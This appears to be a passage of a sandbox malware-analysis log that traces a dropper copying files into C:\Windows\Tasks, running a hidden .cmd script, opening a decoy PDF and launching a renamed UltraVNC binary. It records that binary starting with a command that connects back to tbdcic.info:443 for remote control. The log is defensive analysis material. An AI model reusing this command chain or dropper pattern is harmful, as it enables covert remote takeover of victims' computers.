                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,22_2_00007FF67E7D34B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D18A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,25_2_00007FF67E7D18A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,25_2_00007FF67E7D3550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,25_2_00007FF67E7D34B0
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_004011D1 GetDiskFreeSpaceExW,SendMessageW,0_2_004011D1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,22_2_00007FF67E7D2D00
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,25_2_00007FF67E7D2D00
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E829BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,22_2_00007FF67E829BC0
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_0040385E _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_0040385E
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00401DC9 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401DC9
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Downloads\Lom.pdfJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeMutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
                          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1832:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000Jump to behavior
                          Source: 7q551ugrWe.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sync_browser.exe")
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: 7q551ugrWe.exeReversingLabs: Detection: 23%
                          Source: sync_browser.exeString found in binary or memory: -stopservice
                          Source: sync_browser.exeString found in binary or memory: -install
                          Source: sync_browser.exeString found in binary or memory: -startservice
                          Source: sync_browser.exeString found in binary or memory: -stopservice
                          Source: sync_browser.exeString found in binary or memory: -install
                          Source: sync_browser.exeString found in binary or memory: -startservice
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile read: C:\Users\user\Desktop\7q551ugrWe.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\7q551ugrWe.exe "C:\Users\user\Desktop\7q551ugrWe.exe"
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1724,i,3112944997856603396,2159099869268149404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"Jump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmdJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1724,i,3112944997856603396,2159099869268149404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: apphelp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winmm.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: userenv.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dwmapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: sspicli.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winsta.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: napinsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wshbth.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: mswsock.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winrnr.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wldp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winmm.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: userenv.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dwmapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: napinsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wshbth.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: mswsock.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winrnr.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\cmd.exeFile written: C:\Windows\Tasks\UltraVNC.iniJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeFile opened: C:\Windows\SYSTEM32\RICHED32.DLL
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: 7q551ugrWe.exeStatic file information: File size 1664495 > 1048576
                          Source: Binary string: conhost.pdbUGP source: 7q551ugrWe.exe, 00000000.00000003.1347959077.0000000002792000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr
                          Source: Binary string: conhost.pdb source: 7q551ugrWe.exe, 00000000.00000003.1347959077.0000000002792000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr
                          Source: Nfe70s.UFVVkM.0.drStatic PE information: 0x998FF43F [Tue Aug 22 20:17:03 2051 UTC]
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
                          Source: 7q551ugrWe.exeStatic PE information: real checksum: 0x2af97 should be: 0x19ec51
                          Source: Nfe70s.UFVVkM.0.drStatic PE information: section name: .didat
                          Source: Nfe70s.UFVVkM.2.drStatic PE information: section name: .didat
                          Source: conhost.exe.6.drStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00413660 push eax; ret 0_2_0041368E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E07F8 push rbp; iretd 22_2_00007FF67E7E07F9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7CFEF1 push rcx; ret 22_2_00007FF67E7CFEF2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7DDC01 push rcx; ret 22_2_00007FF67E7DDC02
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E1400 push rbp; iretd 22_2_00007FF67E7E1401
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7DDC11 push rax; ret 22_2_00007FF67E7DDC13
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7DDC21 push rsp; ret 22_2_00007FF67E7DDC23
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7F8CF9 push 8B481074h; iretd 22_2_00007FF67E7F8CFF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E12EF push rbp; iretd 22_2_00007FF67E7E12F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E07F8 push rbp; iretd 25_2_00007FF67E7E07F9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7CFEF1 push rcx; ret 25_2_00007FF67E7CFEF2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7DDC01 push rcx; ret 25_2_00007FF67E7DDC02
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E1400 push rbp; iretd 25_2_00007FF67E7E1401
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7DDC11 push rax; ret 25_2_00007FF67E7DDC13
